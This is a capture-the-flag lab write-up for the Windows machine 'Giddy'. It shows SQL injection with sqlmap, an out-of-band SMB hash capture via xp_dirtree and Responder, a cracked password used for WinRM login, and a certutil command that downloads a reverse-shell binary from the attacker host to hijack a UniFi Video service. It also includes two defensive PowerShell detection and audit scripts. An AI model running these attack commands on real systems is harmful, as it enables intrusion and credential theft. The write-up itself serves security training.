[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB Credential Leak+Chameleon-She…

2025-03-19

Information Gathering

IP Address      Open Ports
10.10.10.104    TCP: 80, 443, 3389

$ ip='10.10.10.104'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2025-03-14T03:39:25+00:00; -18m07s from scanner time.
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-14T03:39:25+00:00; -18m08s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2025-03-14T03:39:17+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2025-03-13T03:33:05
|_Not valid after:  2025-09-12T03:33:05
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Windows PowerShell Web Access SQLI && Out-of-Band Data Exfiltration && NTLM-V2

# echo '10.10.10.104 giddy.htb'>>/etc/hosts

$ feroxbuster -u 'http://giddy.htb'

http://giddy.htb/Remote/en-US/logon.aspx?ReturnUrl=%2fRemote%2f

http://giddy.htb/mvc/

$ sqlmap -u 'http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1' -dump --batch

$ sqlmap -u "http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1" --sql-query "EXEC MASTER.sys.xp_dirtree '\\\\10.10.16.33\\share'" --batch

$ responder -I tun0

Stacy::GIDDY:87a923d765a8db…
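
The xp_dirtree request above travels in the query string of a GET request, so it is recorded in the IIS log. A detection pass over constructed W3C log lines follows; it is an added example, not part of the original write-up, and the sample log lines, the field list and the function name Find-OobSqlProbe are assumptions:

```powershell
# Constructed IIS W3C log lines (sample data, not captured from the target).
$sampleLog = @'
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-03-14 03:41:02 GET /mvc/Product.aspx ProductSubCategoryId=1 10.10.16.33 200
2025-03-14 03:41:09 GET /mvc/Product.aspx ProductSubCategoryId=1%3BEXEC%20MASTER.sys.xp_dirtree%20%27%5C%5C10.10.16.33%5Cshare%27-- 10.10.16.33 200
2025-03-14 03:42:30 GET /mvc/Search.aspx q=dir+tree+pruning 192.0.2.7 200
'@

function Find-OobSqlProbe {
    param([string[]]$Lines)
    $procPattern = '\bxp_dirtree\b'          # procedure used in the request above
    $uncPattern  = '\\\\[A-Za-z0-9._-]+\\'   # \\host\ : start of a UNC path
    $fields = @()

    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') {
            # Column order is declared in the log header, so read it from there.
            $fields = ($line -replace '^#Fields:\s*', '').Trim() -split '\s+'
            continue
        }
        if ($line -like '#*' -or [string]::IsNullOrWhiteSpace($line)) { continue }

        $values = $line -split ' '
        $row = @{}
        for ($i = 0; $i -lt [Math]::Min($fields.Count, $values.Count); $i++) {
            $row[$fields[$i]] = $values[$i]
        }

        # The query is logged URL-encoded; decode it before matching.
        $raw   = ([string]$row['cs-uri-query']) -replace '\+', ' '
        $query = [System.Uri]::UnescapeDataString($raw)
        $reasons = @()
        if ($query -match $procPattern) { $reasons += 'xp_dirtree call' }
        if ($query -match $uncPattern)  { $reasons += 'UNC path' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time     = '{0} {1}' -f $row['date'], $row['time']
                ClientIp = $row['c-ip']
                Uri      = $row['cs-uri-stem']
                Reasons  = $reasons -join ', '
                Query    = $query
            }
        }
    }
}

Find-OobSqlProbe -Lines ($sampleLog -split '\r?\n') | Format-List
```

Only the second sample line is reported; the plain request and the benign search containing the words "dir" and "tree" are not. Blocking outbound TCP 445 from the database host stops the SMB authentication attempt that Responder captures here.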

password:xNnWo6272k7x

$ evil-winrm -i 10.10.10.104 -u 'giddy\stacy' -p 'xNnWo6272k7x'

User.txt

53808bfee1c938401f62ff12e0cf17bc

Privilege Escalation: UniFi Video && Chameleon Reverse Shell

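UniFi Video is a video surveillance management application formerly offered by Ubiquiti Networks for managing and recording from UniFi-series IP cameras. It is mainly used for locally deployed video surveillance systems and lets users access the cameras' live video streams and stored recordings locally or remotely.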

https://www.exploit-db.com/exploits/43390

When the "Ubiquiti UniFi Video" service starts, it tries to execute a file named taskkill.exe in C:\ProgramData\unifi-video\

Switch to the registry location for Windows services

*Evil-WinRM* PS C:\ProgramData\unifi-video> Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'

$ icacls C:\ProgramData\unifi-video\

List all services whose name contains "UniFi"

*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services> dir *UniFi*
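
The weakness in this step is a directory that a service executes from while ordinary users can write to it. The audit below is an added example, not part of the original write-up or of UniFi Video; it goes beyond the single directory and lists every Windows service whose binary directory grants write access to a non-administrative principal. The function names Get-WritableAce and Find-WritableServiceDir and the trusted-SID list are assumptions of this example:

```powershell
# Run elevated so every service directory's ACL can be read.
$trustedSids = @(
    'S-1-5-18',       # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',   # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)
# WriteData (0x2) | AppendData (0x4) | GENERIC_ALL | GENERIC_WRITE
$writeBits   = 0x50000006
$inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly

function Get-WritableAce {
    param([Parameter(Mandatory)][string]$Directory)
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    # Ask for SIDs instead of names so the check is locale-independent.
    $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ([int]$_.FileSystemRights -band $writeBits) -ne 0 -and
            ([int]$_.PropagationFlags -band $inheritOnly) -eq 0 -and
            $_.IdentityReference.Value -notin $trustedSids
        }
}

function Find-WritableServiceDir {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        # PathName is "C:\quoted path\svc.exe" args, or C:\path\svc.exe args.
        if ($svc.PathName -match '^\s*"([^"]+)"' -or $svc.PathName -match '^\s*(.+?\.exe)') {
            $dir = Split-Path -Path $Matches[1] -Parent
            if (-not $dir) { return }
            foreach ($ace in (Get-WritableAce -Directory $dir)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Directory = $dir
                    Sid       = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

# Every service on the host, then the directory named in this write-up.
Find-WritableServiceDir | Format-Table -AutoSize
Get-WritableAce -Directory 'C:\ProgramData\unifi-video' |
    Format-Table IdentityReference, FileSystemRights, IsInherited -AutoSize
```

Inherit-only entries are skipped because they do not apply to the directory itself; any row that remains names a principal able to create or replace files next to the service binary.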

https://github.com/MartinxMax/Chameleon

# docker run --rm -v /home/maptnh/Desktop/HTB/Chameleon/reverseshell:/tmp chameleon -gcc reverse_win.c

*Evil-WinRM* PS C:\ProgramData\unifi-video> certutil -urlcache -f http://10.10.16.33/reverse_win_win_x86_64.exe taskkill.exe

Restart the service

*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"

*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"

Root.txt

617e9b8600be08870d099e98e5359f74

